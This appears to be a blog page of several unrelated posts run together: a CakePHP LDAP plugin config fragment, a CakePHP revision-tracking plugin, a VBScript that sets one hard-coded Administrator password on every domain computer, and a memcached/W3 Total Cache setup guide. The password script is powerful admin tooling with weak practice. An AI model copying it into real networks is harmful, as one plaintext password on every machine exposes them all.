$config[‘LDAP’][‘User’][‘Identifier’] = ‘uid’; //What is the LDAP attribute that identifies the username attribute,
// openldap, iplant, netscapr use uid, AD uses samaccountname
$config[‘LDAP’][‘Group’][‘Identifier’] = ‘cn’; //What is the LDAP attribute that identifies the group name, usually cn
[/php]

Have a question?

Discuss it in the CakePHP 2.0 Ldap Plugin Forum

The behavior is built into a plugin because it also has an simple model(table) that it uses to store revisions for all the other tables.  The idea is that when ever you update your table this behavior will jump in, grab the current copy of the data and save it to the revisions table with the current timestamp.  It then adds a few functions to your model you’ve added the behavior on to make sure it can see the previous behaviors.

One of the best features of this plugin is that it will store multiple models revisions all in the same table.

I’ve written this for CakePHP 1.3.x so it make not work with older or newer versions. Let me know if you have any questions or feedback

You may now be asking your self, where can one find such a fine piece of code?  As with most of my code it resides on github  https://github.com/analogrithems/revisionable

So far it is very simple, all you have to do add re-visioning to your models is add the revisionable behavior to your plugin.

Setup

1) First you need to add the table to your project use the following to generate that
cake schema create Revisionable.revision

2) add the behavior to your model like so

[php]
var $actAs = array(‘Revisionable.Revisionable’);
[/php]

Some Configure options

If you already have a table named revisions in your project and need to call the it something else then
make a new table/model in your project that has the same schema as this plugin and pass that model name
to the actAs setup like so

[php]
var $actAs(‘Revisionable.Revisionable’=>array(‘revisionableModel’=>$newModelName));
[/php]

To Do

So far aside from creating a revision everytime the data changes the only other feature of this plugin
is the listRevisions function. It works like this

[php]
$revisions = $this->Model->listRevisions($this->Model->id);

print_r($revisions);
array(
‘2011-12-05 01:01:01’=> array(
‘Pages’ => array(
‘id’=> ‘4edd8cc3-a628-490b-8cbf-6435ac1005e9’,
‘name’=> ‘foobar’,
‘body’=> ‘….’
)
)
);
[/php]

Need to create some more functions that add to this, like a a restore where you pass the id & date and
it will do a restore and perhaps a diff viewer. Patches are warmly welcome.

 
Also I use uuid as my primaryKeys I will try to find some time to ad a configuration option that will allow for int as the primaryKey. In all reality, nothing really prevents this from working with int except for the table schema, so if you just change the table schema to use int then the rest of the plugin will follow.

[sourcecode language=”vb”]
On Error Resume Next
rem http://blogs.technet.com/b/heyscriptingguy/archive/2007/07/03/how-can-i-change-the-local-administrator-password-on-all-my-computers.aspx
Const ADS_SCOPE_SUBTREE = 2

Set objConnection = CreateObject("ADODB.Connection")
Set objCommand = CreateObject("ADODB.Command")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"

Set objCommand.ActiveConnection = objConnection
objCommand.CommandText = _
"Select Name From ‘LDAP://DC=yourcompany,DC=com’ Where objectClass=’computer’"
objCommand.Properties("Page Size") = 1000
objCommand.Properties("Searchscope") = ADS_SCOPE_SUBTREE
Set objRecordSet = objCommand.Execute
objRecordSet.MoveFirst

Do Until objRecordSet.EOF
strComputer = objRecordSet.Fields("Name").Value

Set objUser = GetObject("WinNT://" & strComputer & "/Administrator")
objUser.SetPassword "mynewpassword!"

objRecordSet.MoveNext
Loop
[/sourcecode]

Step 1

The first thing you need to do is download and install Memcache.  Luckily in most distros their is a package for this.  In Centos,Redhat and fedora you can install by simply doing the following.

yum -y install memcached libmemcached php-pecl-memcache

So a few things to note, one is we actually install multiple packages.  The first one is the memcached server, the second one is a set of common client libraries and the last is the php library.  You may at this point be wondering what is Memcache, great question.  Memcache is a simple server that you run to cache data for you.  It cuts down on the amount of SQL queries you do by caching them.  It was originally created by some smart folks at Live Journal to try to ease up on the extreme load they were putting on their databases.   They claimed memcache caused an 80% improvement in performance.

How does it work?

Basically when you need to get some data from your database you check if memcache has that data first, if it does you take that and don’t bother with the expensive db query.  If it doesn’t you query the db and then tell memcache the result.  That way next time you go to get that data you can get it from memcache which will be much faster than your database.  This is important in ecommerce because on a single page load you can make over 700 sql queries.

So once you have memcache installed,  you need to configure it.  I set my cache size to 1024.  This makes is probably overkill for a single ecommerce site, but my server has plenty of memory and I feel it’s work it.  If you installed via an rpm you’ll probably have a config file under /etc/ for Centos/Redhat it will be /etc/sysconfig/memcached  See this page for more documentation on memcached.  Once you have it configured start the memcached service.

chkconfig memcached on
/etc/init.d/memcached start

Step 2

With memcached up and running it’s time to get the wordpress side configured to take advantage of this.  Login to your dashboard as admin and go to the plugins section.  Install the W3 Tototal Cache Plugin and activate it.  The click on the Performance tab of the left column.

Enable the following and set the method to memcached

• Page Cache
• Database Cache
• Object Cache

Click on the Page Cache link on the left and make sure that the memcache server configuration is correctly set.  Do this again for Database Cache & Object Cache.  Once you are done visit a few of your public facing pages.  At first you probably wont notice a performance increase until you or anyone clicks on those pages again.  The next time the page loads it will have a lot of the information now stored in memcache and wont need to fetch nearly as much from the DB.  If after a few minutes you do get a noticeable page boost check the Trouble shooting section below

Summary

Using this method I got my page load times to go from 2500ms to 56ms.  One thing to note is that when ever you recycle the memcache server you will need to rebuild your cache.  This is often referred to as warming up the cache.  I’ve created small wget script to spider my sites and cause the cache to get get built quickly so when customers hit the pages they are already cached.

In the future the WP eCommerce is working on optimizing their pages by combining several of the sql queries to reduce the overall calls to the server. In the meant time a lot can be gained by using the method outlines here.

One thing I should also add is make sure that you limit access to your memcached service via firewalls to make sure only your webservers have access to get and set vaules in it.

Trouble Shooting

To verify your memcached server is running and storing items properly from wordpress try the following.

root@vault events]#  echo "stats cachedump 3 100" | nc localhost 11211
ITEM test_15c03fbb2a8143d215b4204a3fec2bc8 [37 b; 1318205585 s]
ITEM test_a0b9d95d725c92d1f886bab92090476d [37 b; 1318205581 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_31f40b57771bd6985c9ede7f4d365d81 [10 b; 1318207066 s]
ITEM test_2adea0d314e2e162e5808cf0cf89c93a [37 b; 1318205578 s]
ITEM test_0e9aeb2846e86ee40d7ef87f10983db7 [37 b; 1318205541 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_d938afab08d705a5284e70001f04e078 [10 b; 1318207280 s]
ITEM w3tc_ecom-dev.analogrithems.com_object_887ca248c5dc568895f73a2da40408a0 [1 b; 1318207055 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_9d8ea174ea710ccf7d1e137da3837713 [1 b; 1318207055 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_b490861e41e39835d63036e06aac92ec [1 b; 1318207055 s]
ITEM w3tc_ecom-dev.analogrithems.com_1_object_2c16037bdfdf0b7f39dabc763607beed [1 b; 1318207055 s]
END

Read the original paper Here